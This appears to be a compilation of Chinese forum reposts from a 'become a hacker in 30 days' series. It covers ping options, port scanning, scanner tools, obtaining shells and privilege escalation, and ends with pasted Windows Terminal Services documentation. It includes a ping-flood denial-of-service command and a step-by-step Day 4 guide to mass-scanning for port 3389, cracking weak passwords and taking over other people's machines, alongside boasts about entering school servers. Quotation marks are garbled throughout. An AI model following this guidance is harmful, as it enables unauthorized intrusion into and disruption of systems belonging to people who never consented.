  AppMgmt;AudioSrv;Browser;CryptSvc;DMServer;EventSystem;HidServ;Ias;Iprip;Irmon;LanmanServer;LanmanWorkstation;Messenger;Netman;Nla;Ntmssvc;NWCWorkstation;Nwsapagent;Rasauto;Rasman;Remoteaccess;Sacsvr;Schedulu;Seclogon;SENS;Sharedaccess;Themes;TrkWks;TrkSvr;W32Time;WZCSVC;Wmi;WmdmPmSp;winmgmt;wuauserv;BITS;ShellHWDetection;helpsvc;uploadmgr;WmdmP]SN;SRServic
  输入完毕后,经检查确定无误后,单击&确定&按钮并关闭注册表编辑器。
  第5步:重新启动计算机,你会发现错误提示已经没有了。现在我们在桌面上用鼠标右键单击&我的电脑&,选择&属性&,打开&系统属性&对话框,如图所示,&系统还原&的选项卡出现了!
转载 ̄ ̄PING命令的高级用法
于Windows下ping命令相信大家已经再熟悉不过了,但是能把ping的功能发挥到最大的人却并不是很多,当然我也并不是说我可以让ping发挥最大的功能,我也只不过经常用ping这个工具,也总结了一 些小经验,现在和大家分享一下.
现在我就参照ping命令的帮助说明来给大家说说我使用ping时会用到的技巧,ping只有在安装了 TCP/IP协议以后才可以使用:
ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [-j computer-list] │ [-k computer-list] [-w timeout] destination-list
-t Ping the specified host until stopped.To see statistics and continue - type Control- BTo stop - type Control-C.
不停的ping地方主机,直到你按下Control-C。
此功能没有什么特别的技巧,不过可以配合其他参数使用,将在下面提到。
-a Resolve addresses to hostnames.
解析计算机NetBios名。
C:\&ping -a 192.168.1.21
[192.168.1.21] with 32 bytes of data:
Reply from 192.168.1.21: bytes=32 time&10ms TTL=254
Reply from 192.168.1.21: bytes=32 time&10ms TTL=254
Reply from 192.168.1.21: bytes=32 time&10ms TTL=254
Reply from 192.168.1.21: bytes=32 time&10ms TTL=254
Ping statistics for 192.168.1.21:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli- seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
从上面就可以知道IP为192.168.1.21的计算机NetBios名为。
-n count Number of echo requests to send.
发送count指定的Echo数据包数。
  在默认情况下,一般都只发送四个数据包,通过这个命令可以自己定义发送的个数,对衡量网络速度很有帮助,比如我想测试发送50个数据包的返回的平均时间为多少,最快时间为多少,最慢时间为多少就可以通过以下获知:
C:\&ping -n 50 202.103.96.68
Pinging 202.103.96.68 with 32 bytes of data:
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Request timed out.
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Ping statistics for 202.103.96.68:
Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:
Minimum = 40ms, Maximum = 51ms, Average = 46ms
 从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中,返回了48个,其中有两个由于未知原因丢失,这48个数据包当中返回速度最快为40ms,最慢为51ms,平均速度为46ms。
-l size Send buffer size.
定义echo数据包大小。
  在默认的情况下windows的ping发送的数据包大小为32byt,我们也可以自己定义它的大小,但有一个大小的限制,就是最大只能发送65500byt,也许有人会问为什么要限制到65500byt,因为Windows系列的系统都有一个安全漏洞(也许还包括其他系统)就是当向对方一次发送的数据包大于或等于65532时,
对方就很有可能当机,所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制,但这个参数配合其他参数以后危害依然非常强大,比如我们就可以通过配合-t参数来实现一个带有攻击性的命令:(以下介绍带有危险性,仅用于试验,请勿轻易施于别人机器上,否则后果自负)
C:\&ping -l 65500 -t 192.168.1.21
Pinging 192.168.1.21 with 65500 bytes of data:
Reply from 192.168.1.21: bytes=65500 time&10ms TTL=254
Reply from 192.168.1.21: bytes=65500 time&10ms TTL=254
  这样它就会不停的向192.168.1.21计算机发送大小为65500byt的数据包,如果你只有一台计算机也许没有什么效果,但如果有很多计算机那么就可以使对方完全瘫痪,我曾经就做过这样的试验,当我同时使用10台以上计算机ping一台Win2000Pro系统的计算机时,不到5分钟对方的网络就已经完全瘫痪,网络严重堵塞,HTTP和FTP服务完全停止,由此可见威力非同小可。
-f Set Don't Fragment flag in packet.
在数据包中发送&不要分段&标志。
在一般你所发送的数据包都会通过路由分段再发送给对方,加上此参数以后路由就不会再分段处理。
-i TTL Time To Live.
指定TTL值在对方的系统里停留的时间。
此参数同样是帮助你检查网络运转情况的。
-v TOS Type Of Service.
将&服务类型&字段设置为 tos 指定的值。
-r count Record route for count hops.
在&记录路由&字段中记录传出和返回数据包的路由。
  在一般情况下你发送的数据包是通过一个个路由才到达对方的,但到底是经过了哪些路由呢?通过此参数就可以设定你想探测经过的路由的个数,不过限制在了9个,也就是说你只能跟踪到9个路由,如果想探测更多,可以通过其他命令实现,我将在以后的文章中给大家讲解。以下为示例:
C:\&ping -n 1 -r 9 202.96.105.101 (发送一个数据包,最多记录9个路由)
Pinging 202.96.105.101 with 32 bytes of data:
Reply from 202.96.105.101: bytes=32 time=10ms TTL=249
Route: 202.107.208.187 -&
202.107.210.214 -&
61.153.112.70 -&
61.153.112.89 -&
202.96.105.149 -&
202.96.105.97 -&
202.96.105.101 -&
202.96.105.150 -&
61.153.112.90
Ping statistics for 202.96.105.101:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 10ms, Average = 10ms
  从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187 ,202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97这几个路由。
-s count Timestamp for count hops.
指定 count 指定的跃点数的时间戳。
此参数和-r差不多,只是这个参数不记录数据包返回所经过的路由,最多也只记录4个。
-j host-list Loose source route along host-list.
利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。
-k host-list Strict source route along host-list.
利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9。
-w timeout Timeout in milliseconds to wait for each reply.
指定超时间隔,单位为毫秒。
此参数没有什么其他技巧。
  ping命令的其他技巧:在一般情况下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列,一般情况下Windows系列的系统返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在240-255之间,当然TTL的值在对方的主机里是可以修改的,Windows系列的系统可以通过修改注册表以下键值实现:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
&DefaultTTL&=dword:000000ff
转载::&30天打造专业红客!&
『第1天』何谓黑客?
何谓&黑客&
黑客是英文&HACKER&的音译。动词原形为&HACK&,意为&劈&、&砍&。英文词典是这样解释黑客行为:未经授权进入一个计算机的存储系统,如数据库。中文译成&黑客&贬义比英文原义似乎略重,有&未经允许&等不合法的含义。另一种说法是,HACK是本世纪早期麻省理工学院俚语,有&恶作剧&之意,尤其指手法巧妙,技术高明的恶作剧,并且带有反既有体制的色彩。
四代黑客铸就了网络
有人说,美国人创造了黑客,如同他们创造了牛仔。
本世纪60至70年代,一群大学计算机系教室里的知识分子利用&分时系统&技术把计算机主机变成了事实上的个人计算机,从而使更多的人有机会接触到计算机。这些人就是第一代黑客。当时做一名计算机黑客是一件很荣耀的事,它意味着对电脑的全身心的投入,虽然可能被外人视为疯狂之举。
70年代后期,第二代黑客领头人是大名鼎鼎的史蒂夫。乔布斯、史蒂夫、伍兹尼亚克和费尔森斯坦,发明并产生了个人计算机。他们都是非学术界的,属铁杆反文化的类型。作为坚定的反文化分子,他们使计算机王国的老大IBM颜面尽失。
80年代初出现的第三代黑客,为个人计算机设计了各种应用教育和娱乐程序。特别是米彻&凯普发明的LOTUS1 1-2-3电子报表程序促成了IBM PC的成功。
第四代黑客出现在80年代中期。他们发明了包罗万象的电子公告牌(BBS)和自由平等的以非层级方式连接的USENET,并且将美国国防部的阿帕网(ARPANET)改造成了今天的互联网络。
黑客的&道德准则&
互联网现在有上千万用户,平均年龄为30岁。很多人深信,就像个人计算机改变了80年代一样,互联网将改变90年代。
&想真正成为黑客,你必须真枪实弹去做黑客应该做的事情。&这是黑客的宣言,并且广告天下,他们声称:不要将你已破解的任何信息与人分享,除非此人绝对可以信赖。不在家庭电话中谈论你HACK的任何事情。当你发送相关信息的BBS时,对你当前所做的黑事尽可能说得含糊一些,以避免BBS受到警告。将你的黑客资料放在安全的地方。在BBS上POST文章的时候不要使用真名和真实的电话号码。如果你黑了某个系统,绝对不要留下任何蛛丝马迹。
显然,一些所谓的道德准则是需要打上一个引号的。但也确实有一些是较为人称道的。如:不要侵入或破坏政府机关的主机;不恶意破坏任何系统;不破化别人的软件或资料&&
一切信息都应该是免费的
&一切信息都应该是免费的&。黑客们也有自己的伦理原则。他们深信,任何一个人都能在计算机上创造艺术与美,计算机能够使生活变得更美好。
黑客最重要的信条是不相信权威当局,提倡依*自己。他们把美国已故肯尼迪的话,&不要问你的国家能为你做些什么,要问你能为国家做些什么&改成了&不要问你的国家能为你做些什么,你自己做&。因此,他们中大多数人一改过去学术界蔑视商界的传统,半途辍学支办自己的公司。他们认为信息应该是免费的信息创造了&免费软件&和&共享软件&的概念,使得每个需要这些软件的人都可以得到它们。
坚持&三项基本原则&
国外《PHRACK》杂志被认为是黑客的&官方&新闻通讯,它把黑客的思想扩展成一些基本原则,被概括为一些基本原则。主要内容为&因为设备的高代价超出了大多数黑客的财力,它在感觉上造成的结果是,劈和砍是把计算机知识传给大众的唯一办法&。黑客们坚决反对&权利&只属于那些有权进入和使用现代技术的群体。
基于上述的分析来看,要认识黑客的确不是一件容易的事。不过我们似乎已经明白,黑客不应该总在贬义上被使用。而是应该记住雨果、康沃尔在《黑客手册》一书说的话:&黑客活动的乐趣和报偿纯粹是智力上的&,他们&不过沿袭了一个长期的历史传统,人类社会中,总有那么一批人对机器和技术着迷,他们使用技术时抱着一种嬉戏的态度,以观察会有什么结果发生&。
还有我希望提醒大家严格遵守守则,另外中国的法律在健全,请不要随意做破坏网络的事
『第2天』从端口说起
早上起的很早,就开始忙了,我想昨天讲了一些命令后今天就从端口说起吧
从网上抄了一份详细的端口意义:
有些端口是比较重要的比如135,137,138,139,445之类,那我扫描到的端口到底有什么用?我想你肯定要问,这样今天,我就用一个真实的扫描向你讲述扫到的端口的用途。
被扫的主机:192.***.xx.x
主机IP数:4
发现的安全漏洞:7个
安全弱点:45个
系统: Standard: Solaris 2.x, Linux 2.1.???, Linux 2.2, MacOS
Telnet (23/tcp)
ssh (22/tcp)
ftp (21/tcp) (发现安全漏洞)
netstat (15/tcp)
daytime (13/tcp)
systat (11/tcp)
echo (7/tcp)
time (37/tcp)
smtp (25/tcp)
www (80/tcp) (发现安全漏洞)
finger (79/tcp)
auth (113/tcp)
sunrpc (111/tcp)
pop-2 (109/tcp)
linuxconf (98/tcp)
imap2 (143/tcp)
printer (515/tcp)
shell (514/tcp)
login (513/tcp)
exec (512/tcp)
unknown (693/tcp)
unknown (698/tcp)
unknown (727/tcp)
swat (910/tcp)
unknown (1025/tcp)
unknown (1039/tcp)
unknown (1038/tcp)
unknown (1037/tcp)
unknown (1035/tcp)
unknown (1034/tcp)
unknown (3001/tcp)
unknown (6000/tcp)
echo (7/udp)
general/tcp
daytime (13/udp)
unknown (728/udp) (发现安全漏洞)
unknown (2049/udp)
unknown (681/udp)
unknown (2049/tcp)(发现安全漏洞)
可用telnet登录的端口 (23/tcp)
这个信息表明远程登录服务正在运行,在这里你可以远程登录到该主机,这种不用密码的远程登录服务是危险的,如果可以匿名登录,任何人可以在服务器和客户端之间发送数据。
发现的可攻击弱点 (21/tcp)
我在那里发现了一个目录是可写的:
ftp端口 (21/tcp)
ftp服务TELNET服务一样,是可以匿名登录的,而且在有的机器上它还允许你执行远程命令,比如CWD ~XXXX,如果你能CWD ROOT成功,那你就可以获得最高权限了,不过这样的好事好像不多。另外,有时还能用它获得一个可用的帐号(guest),或得知主机在运行什么系统
13/tcP(daytime)
从这里可以得知服务器在全天候运行,这样就有助于一个入侵者有足够的时间获取该主机运行的系统,再加上udp也在全天候的运行,这样可以使入侵者通过UDP欺骗达到主机拒绝服务的目的
ECHO(7/tcp)
这个端口现在没什么用处,但它可能成为一个问题的来源,顺着它有可能找到其它端口以达到拒绝服务的目的。
(25/tcp)smtp端口
该端口开放邮件传输协议
回应可执行EXPN和VRFY命令
EXPN可以发现发送邮件的名称或者能找到一个完整的邮件接收人的名称。
VRFY命令可以用来检测一个帐号的合法性
我们可以试着发这样一个类型的邮件给它:
我们会收到一个这样的邮件:
也许我们就能用它穿过防火墙
WWW(80/TCP)端口
它表明WWW服务在该端口运行
finger (79/tcp) 端口
finger服务对入侵者来说是一个非常有用的信息,从它可以获得用户信息,查看机器的运行情况等
auth (113/tcp)
ident服务披露给入侵者的将是较敏感的信息,从它可以得知哪个帐号运行的是什么样的服务,这将有助于入侵者集中精力去获取最有用的帐号(也就是哪些人拥有ROOT权限)
(98/tcp) LINUX在这个端口上运行
(513/tcp) RLOGIN在这个端口上运行
这种服务形同于TELNET,任何人可以在它的引导下在客户端和服务端之间传送数据。
exec (512/tcp)
rexecd在该端口开放,该服务使一个破译者有机会从它那里扫描到另外一个IP,或者利用它穿过防火墙。
也许你还能发现很多端口,不同的端口会有不同的作用
我最喜欢开135端口的,我们学校的几个FTP和主机都开了135端口,还用默认密码(不知道是为什么,我想主要是管理员考虑我们找不到肉鸡了『都2004年了,肉鸡很难找的,因为各位大侠都用着呢』,所以特地给我们准备好了),把我高兴的几天都没睡好,可惜里面没什么东西。只能当空间用着了。不过我们学校的主机大都用的是UNIX的,不是瘟二钱的,所以也让人有点郁闷啊,UNIX有点复杂,我只得从0学,还有点难,我会在后面讲到的,现在我们主要是关注WIN2000操作系统的主机了,说到这不能不提一下WIN2K源代码的泄漏,兄弟我在第一时间拿到了这个泄漏的源代码,有230M,还真多,看了一个晚上,也不怎么了解,反正有的是时间,先贴一段,大家瞧瞧,有看懂的,就不用来这看这了,呵呵
贴在网络技术里了
至于软件方面我喜欢用流光(有些人或许不知道这是什么),是扫描器,很好用,是国产的,就是前面访问的小容做的,但他在里面设置了限制不许PING国内的主机,但好多大哥早就破掉了(感觉很幸福啊,不用自己破了),现在的最高版本好像是流光5.0吧,到GOOGLE 上搜一下就能找到N个,我就不说了(要提高动手能力嘛)
下面我来介绍几种常见的扫描器:
一。NSS(网络安全扫描器)
NSS由Perl语言编成,它最根本的价值在于它的速度,它运行速度非常快,它可以执行下列常规检查:
■Sendmail
■Hosts.equiv
注:除非你拥有最高特权,否则NSS不允许你执行Hosts.equiv。
利用NSS,用户可以增加更强大的功能,其中包括:
■AppleTalk扫描
■Novell扫描
■LAN管理员扫描
■可扫描子网
简单地说,NSS执行的进程包括:
■取得指定域的列表或报告,该域原本不存在这类列表
■用Ping命令确定指定主机是否是活性的
■扫描目标主机的端口
■报告指定地址的漏洞
尽管没有详尽讨论NSS,但我在这里要说明一些次要的问题:
■在对NSS进行解压缩后,不能立即运行NSS,需要对它进行一些修改,必须设置一些环境变量,以适应你的机器配置。主要变量包括:
■$TmpDir_NSS使用的临时目录
■$YPX-ypx应用程序的目录
■$PING_可执行的ping命令的目录
■$XWININFO_xwininfo的目录
提示:如果你隐藏了Perl include目录(目录中有Perl include文件),并且在PATH环境变量中没有包含该目录,你需要加上这个目录;同时,用户应该注意NSS需要ftplib.pl库函数。NSS具有并行能力,可以在许多工作站之间进行分布式扫描。而且,它可以使进程分支。在资源有限的机器上运行NSS(或未经允许运行NSS)应该避免这种情况,在代码中有这方面的选项设置。
你可在下面地址找到NSS拷贝。
二。Strobe(超级优化TCP端口检测程序)
strobe是一个TCP端口扫描器,它可以记录指定机器的所有开放端口。strobe运行速度快(其作者声称在适中的时间内,便可扫描整个一个国家的机器)。
strobe的主要特点是,它能快速识别指定机器上正在运行什么服务。strobe的主要不足是这类信息是很有限的,一次strobe攻击充其量可以提供给&入侵者&一个粗略的指南,告诉什么服务可以被攻击。但是,strobe用扩展的行命令选项弥补了这个不足。比如,在用大量指定端口扫描主机时,你可以禁止所有重复的端口描述。(仅打印首次端口定义)其他选项包括:
■定义起始和终止端口
■定义在多长时间内接收不到端口或主机响应,便终止这次扫描。
■定义使用的socket号码
■定义strobe要捕捉的目标主机的文件
提示:在你获得strobe的同时,必然获得手册页面,这对于Solaris 2.3是一个明显的问题,为了防止发生问题,你必须禁止使用getpeername()。在行命令中加入-g 标志就可以实现这一目的。
同时,尽管strobe没有对远程主机进行广泛测试,但它留下的痕迹与早期的ISS一样明显,被strobe扫描过的主机会知道这一切(这非常象在/var/adm/messages文件中执行连接请求)。
三。SATAN(安全管理员的网络分析工具)
SATAN是为UNIX设计的,它主要是用C和Perl语言编写的(为了用户界面的友好性,还用了一些HTML技术)。它能在许多类UNIX平台上运行,有些根本不需要移植,而在其他平台上也只是略作移植。
注意:在Linux上运行SATAN有一个特殊问题,应用于原系统的某些规则在Linus平台上会引起系统失效的致命缺陷;在tcp-scan模块中实现select()调用也会产生问题;最后要说的是,如果用户扫描一个完整子网,则会引进反向fping爆炸,也即套接字(socket)缓冲溢出。但是,有一个站点不但包含了用于Linux的、改进的SATAN二进制代码,还包含了diff文件,这些条款可以在
上发现,或者可以直接从Sun站点(sunsite.unc.edu)取得diff文件:
/pub/linux/system/network/admin/satan-linux.1.1.1.diff.gz
SATAN用于扫描远程主机的许多已知的漏洞,其中包括,但并不限于下列这些漏洞:
■FTPD脆弱性和可写的FTP目录
■NFS脆弱性
■NIS脆弱性
■RSH脆弱性
■Sendmail
■X服务器脆弱性
你可在下面地址中获得SATAN的拷贝:
SATAN的安装和其他应用程序一样,每个平台上的SATAN目录可能略有不同,但一般都是/satan-1.1.1。安装的第一步(在阅读了使用文档说明后)是运行Perl程序reconfig。这个程序搜索各种不同的组成成分,并定义目录路径。如果它不能找到或定义一个浏览器。则运行失败,那些把浏览器安装在非标准目录中(并且没有在PATH中进行设置)的用户将不得不手工进行设置。同样,那些没有用DNS(未在自己机器上运行DNS)的用户也必须在/satan-1.1.1/conf/satan.cf中进行下列设置:$dont_use_nslookuo=1;在解决了全部路径问题后,用户可以在分布式系统上运行安装程序(IRIX或SunOS),我建议要非常仔细地观察编译,以找出错误。
提示:SATAN比一般扫描器需要更多一些的资源,尤其是在内存和处理器功能方面要求更高一些。如果你在运行SATAN时速度很慢,可以尝试几种解决办法。最直接的办法就是扩大内存和提高处理器能力,但是,如果这种办法不行,我建议用下面两种方法:一是尽可能地删除其他进程;二是把你一次扫描主机的数量限制在100台以下。最后说明的一点是,对于没有强大的视频支持或内存资源有限的主机,SATAN有一个行命令接口,这一点很重要。
Jakal是一个秘密扫描器,也就是就,它可以扫描一个区域(在防火墙后面),而不留下任何痕迹。
秘密扫描器工作时会产生&半扫描&(half scans),它启动(但从不完成)与目标主机的SYN/ACK过程。从根本上讲,秘密扫描器绕过了防火墙,并且避开了端口扫描探测器,识别出在防火墙后面运行的是什么服务。(这里包括了像Courtney和GAbriel这样的精制扫描探测器)
在下面地址中可以找到由Half life,Jeff(PhiJi)Fay和Abdullah Marahie编写的Jakal拷贝:
⑸IdentTCPscan
IdentTCPscan是一个更加专业化的扫描器,其中加入了识别指定TCP端口进程的所有者的功能,也就是说,它能测定该进程的UID。
五.CONNECT
CONNECT是一个bin/sh程序,它的用途是扫描TFTP服务子网
六。FSPScan
FSPScan用于扫描FSP服务顺。FSP代表文件服务协议,是非常类似于FTP的Internet协议。它提供匿名文件传输,并且据说具有网络过载保护功能(比如,FSP从来不分*)。FSP最知名的安全特性可能就是它记录所有到来用户的主机名,这被认为优于FTP,因为FTP仅要求用户的E-mail地址(而实际上根本没有进行记录)。FSP相当流行,现在为Windows 和OS/2开发了GUI客户程序
XSCAN扫描具有X服务器弱点的子网(或主机)。乍一看,这似乎并不太重要,毕竟其他多数扫描器都能做同样的工作。然而,XSCAN包括了一个增加的功能:如果它找到了一个脆弱的目标,它会立即加入记录。
XSCAN的其他优点还包括:可以一次扫描多台主机。这些主机可以在行命令中作为变量键入(并且你可以通过混合匹配同时指定
上面的有些是英文界面的,不过好像不少都用汉化补丁,找找吧。
还要推荐一个特好的(我第一次见到她就喜欢上了)就是SSS,Shadow Security Scanner
天天安全的SSS下载能即使更新
关于NAMP的使用大家看看这个帖子
[第3天]继续讲扫描
有人提意见了,说讲的太慢了,可我无法想象你连扫描,端口之类还弄不清楚,怎么进一步发展呢,昨天讲了扫描,相信很多朋友已经PING 了很多主机了吧,千万别弄我的啊,我用的是人家的主机,他们很白的。找到了漏洞的目的是什么呢?是控制对方,即是获得远程shell。shell这个概念是从UNIX下继承过来的,是指与xx作系统核心的一种交互方式和界面。还是不懂是吗?有篇关于SHELL的帖子大家去看一看
,如果还不知道就算了,你知道有这个词就可以了。
怎么得到shell呢?这很关键,有很多方法:典型的例子是telnet。得到shell的办法有很多种,比如通过系统自带的telnet,终端服务。或者用木马和工具提供的,如winshell,冰河等等。说到冰河我不想说那么多没有篇文章很好大家看一下:
得到shell后,不是所有权限都会开的,得到管理员权限当然是我们的梦想了。所以有时会有提升权限的问题。当然这也是利用了漏洞。
Win2K 提升权限漏洞
Microsoft SQL Server Webtasks权限提升漏洞
Linux kernel ptrace提升权限漏洞
IIS提升权限漏洞
当然这些漏洞大都有补丁可下了,如果管理员勤快的话就不好了,不过很多人都很马虎的,我认识个管理员是一个高校的,用的是win2000竟从不打补丁,理由是俺用的是D版的,打补丁恐怕会冲系统啊(有道理啊)
觉得讲shell还不透彻(有朋友发短信问我了),我查了一下资料:
Shell是什么?
  任何发明都具有供用户使用的界面。UNIX供用户使用的界面就是Shell(DOS的command熟悉吧,但UNIX的要强大的多)。 Shell为用户提供了输入命令和参数并可得到命令执行结果的环境。形象点就是:dos中的就是一种shell程序
今天就说到这,最后写个小知识:针对网吧的限制 对有些朋友或许有用哦
[第4天]从终端服务3389讲起
昨天我们讲到了提升权限的问题,好现在我们就来说一个简单的入侵,从3389找个肉鸡(没有肉鸡的话,对自己的技术提高是没好处的,不能老是看却不练啊,陈同学你说对吗?)
请各位注意,我这里并不是说什么烂鬼输入法漏洞。这种漏洞差不多已经绝迹了,太难找了,如果有人找到了,那恭喜你啦。众所周知,有开3389的一般都是服务器,也就是说有很大可能带局域网的,而内部入侵比外部要方便一点,这对大家是很好的,我想看我这个东西的很多都是学生吧(声明我就个学生哦)。如何能快速方便的得到开了终端的肉机呢?这需要用到两个工具,都是扫描工具来的,scanner3.0和焦点的xscan。打开scanner,输入一段IP,范围要大一点,scanner速度很快的。在&所有端口从&那里都填3389,点击&开始&就可以开工了。
很快的,扫描完成,结果出来了。点击右下脚的&删除&把多余的IP删了,只留下开了3389的IP。再点击&保存&,把结果保存到文件夹里。找到保存文件的目录,打开它。用记事本的替换功能把它保存为一个纯IP的TXT文件。&编辑-替换&在&查找内容&里输入要删除的垃圾,再点&全部替换&就行了。打开xscan,点击左边的蓝色按钮,进入&扫描板块&,只需在&SQL-Server弱口令&&NT-Server弱口令&前打钩,其他都清除掉。再点击右边的蓝色按钮,进入&扫描参数&,钩上&从文件获取主机列表&,打开刚才替换成纯IP的TXT文件,确定之后就可以扫描了。这时需要比较长的时间!(注意我是拿3.0为例的,其他的也差不多)。确定目标,用mstsc(登陆终端的工具,这个我不喜欢用,但确实很容易上手的)登陆对方主机后,打开对方cmd.exe,输入&net use&,先看看有没有人也在连接这部机(安全一点好,毕竟不是在学雷峰啊)。&net view&命令之后当出现一堆前面带字符的就表示~~就表示什么呢??我想大家都非常明白吧!,如果不明白的话,我。。(也不知道怎么说了 )
想做个补充
发现很多朋友对什么叫终端服务有点模糊
好,我们就详细说说 毕竟这个概念很重要的
终端服务提供了通过作为终端仿真器工作的&瘦客户机&软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。
终端服务可以在应用服务器模式或远程管理模式下在服务器上进行配置。作为应用服务器,终端服务提供了一种有效而可*的方式,通过网络服务器分发基于 Windows 的程序。在应用服务器模式下,终端服务为可能无法正常运行 Windows 的计算机显示 Windows 2000 的桌面以及目前基于 Windows 的大多数应用程序。在远程管理模式下使用时,终端服务提供了远程访问的能力,使您可以从网络上的任何地方虚拟地管理您的服务器。
终端服务有以下好处:
更快地显示 Windows 2000 的桌面。终端服务架设了一座从旧式桌面迁移到 Windows 2000 Professional 的桥梁,为非计算机桌面以及需要进行硬件升级才能在本地完全运行 Windows 2000 操作系统的计算机提供了一种虚拟的 Windows 2000 桌面环境。终端服务客户可用于多种不同的桌面平台,包括 MS-DOS、基于 Windows 的终端、Macintosh 和 UNIX。(与 MS-DOS、Macintosh 和基于 UNIX 的计算机的连接需要附加的软件)。
充分利用已有的硬件。终端服务扩展了分布式计算模型,允许计算机同时作为瘦客户机和具有完整功能的个人计算机操作。当计算机在现有的网络上时,可以继续使用,同时也可作为能仿真 Windows 2000 Professional 桌面的瘦客户机使用。
程序的集中配置。使用运行在 Windows 2000 Server 上的终端服务,所有程序的执行、数据的处理以及数据的存储都在服务器上进行,程序得以集中配置。终端服务可确保所有客户机都能访问当前版本的程序。软件只能在服务器上安装一次,而不能安装在您单位的每个桌面上,这样可减少单独更新计算机所花费的成本。
远程管理。终端服务提供了对 Windows 2000 Server 的远程管理,为系统管理员提供了从任何客户机通过广域网或拨号连接远程管理其服务器的一种方法。
功能 说明 详细信息,请参阅:
自动的本地打印机支持 Windows 2000 Server 终端服务可以添加并自动重新连接终端服务客户所连接的打印机。 提供对本地打印机的客户访问
剪贴板重定向 现在,用户可以在运行于本地计算机和终端服务器上的程序之间剪切和粘贴。 共享的剪贴板
性能增强 对缓存功能的增强,包括持久性缓存、数据包的利用和数据帧大小,明显地改进了终端服务的性能。 位图缓存
漫游式断开连接支持 此功能使用户不用注销即可从会话中断开连接。在断开时会话仍可保持活动状态,这使得用户可以从另一台计算机中或在稍后某个时间重新连接到现有会话。重新连接需要登录,以便在任何时候都能保证每个会话的安全性。 注销或断开连接
多登录支持 用户可以登录到多个会话,同时从一个或多个客户机到多个 Windows 2000 Server,或者多次登录到一个服务器。这样,用户就可以同时执行多项任务或运行多个单独的桌面会话。 管理用户和客户机
功能 说明 详细信息,请参阅:
会话远程控制 支持者可查看或控制另一终端服务会话。键盘输入、鼠标移动以及图形显示可在两个终端服务会话之间共享,为支持者提供了诊断和解决配置问题以及远程培训用户的能力。此功能对于带有分支机构的单位特别有用。 远程控制
网络负载平衡 网络负载平衡使终端服务客户可连接到运行终端服务的服务器组中最轻闲的成员。 网络负载平衡和终端服务
基于 Windows 的终端 根据 Windows CE 操作系统和远程桌面协议 (RDP) 的自定义实现,不同的制造商可提供基于 Windows 的终端。
客户连接管理器 管理员和用户可以为一个程序或全部桌面访问建立到服务器的预定义连接。客户连接管理器在客户机桌面上创建图标,以便能通过一次单击连接到一个或多个终端服务器。想在计算环境中提供单个程序的管理员可以创建连接并将该连接与终端服务客户软件一同分发。 管理终端服务用户连接
终端服务授权 终端服务授权帮助系统管理员和采购部门跟踪客户机及其相关许可证。 授权终端服务
分布式文件系统 (DFS) 支持 对分布式文件系统 (DFS) 的支持使用户可以连接到 DFS 共享位置,而且使管理员可以从终端服务器主控 DFS 共享。 分布式文件系统概述
终端服务管理器 管理员可以使用终端服务管理器查询和管理 Windows 2000 Server 上的终端服务会话、用户和进程。 管理终端服务
终端服务配置 终端服务连接配置可用于创建、修改和删除 Windows 2000 Server 上的一个或一组会话并访问服务器设置。 配置终端服务
与 Windows 2000 Server&本地用户和组&以及&Active Directory 用户和计算机&的集成 管理员可以按照为 Windows 2000 Server 用户创建帐户的相同方式为终端服务用户创建帐户。另有一些字段可用来指定终端服务专用信息,如终端服务配置文件路径和主目录。 终端服务用户帐户
与 Windows 2000 Server 系统监视器的集成 与 Windows 2000 Server 系统监视器的集成使管理员可以监视器终端服务系统性能,包括跟踪处理器的使用情况、内存分配和分页内存使用情况,并在每个用户的会话之间交换。 性能监视
消息传递支持 管理员可以就一些重要的信息警告用户,如系统关机、升级或新程序。 使用终端服务管理器
远程管理 具有管理级特权而且可访问终端服务管理级实用程序的任何用户都可以远程管理运行终端服务的服务器的各方面工作。
可配置的会话超时设置 管理员可以通过配置会话超时来减少服务器资源的使用。管理员可以指定活动会话的长度以及会话可在服务器上闲置多长时间 配置会话限制
功能 说明 详细信息,请参阅:
加密 多级加密使管理员可以根据安全性需要在三种不同级别(低级、中级或高级)上加密在 Windows 2000 Server 和终端服务客户之间传输的所有或部分数据。另外,终端服务登录过程包括更改密码、桌面解锁以及屏幕保护功能解锁。登录过程是加密的,以确保用户名称和密码的安全传输。终端服务支持在服务器和客户机之间的 40 位和 128 位加密(128 位加密只能在美国和加拿大使用)。 确定加密的级别
限制登录尝试和连接时间 管理员可以限制用户登录尝试次数,以防止有人未授权访问服务器。另外,个别用户或分组用户的连接时间可以进行限制。 配置终端服务
终端服务配置概述
终端服务连接提供了客户机可用于登录到服务器上某个会话的链接。TCP/IP 连接是当终端服务在 Windows 2000 Server 上启用时自动配置的。使用终端服务配置,您可以更改连接的默认属性或添加新连接。
终端服务配置
